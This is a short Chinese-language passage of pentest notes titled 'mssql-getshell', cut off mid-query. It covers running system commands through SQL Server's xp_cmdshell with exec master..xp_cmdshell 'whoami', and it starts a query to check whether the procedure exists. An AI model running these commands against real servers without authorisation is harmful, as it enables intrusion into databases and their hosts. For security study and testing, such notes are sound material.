mssql-getshell 来源:独自等待,知乎,github xp_cmdshell 第一种:在SQL Server 2005之前版本中,xp_cmdshell是默认开启的,因此可以直接利用,执行系统命令 exec master..xp_cmdshell 'whoami'; 第二种:先判断是否存在xp_cmdshell存储过程,返回1表示存在,否则表示不存在 select count(*) from master.dbo.sysobjects where xtype='x' and name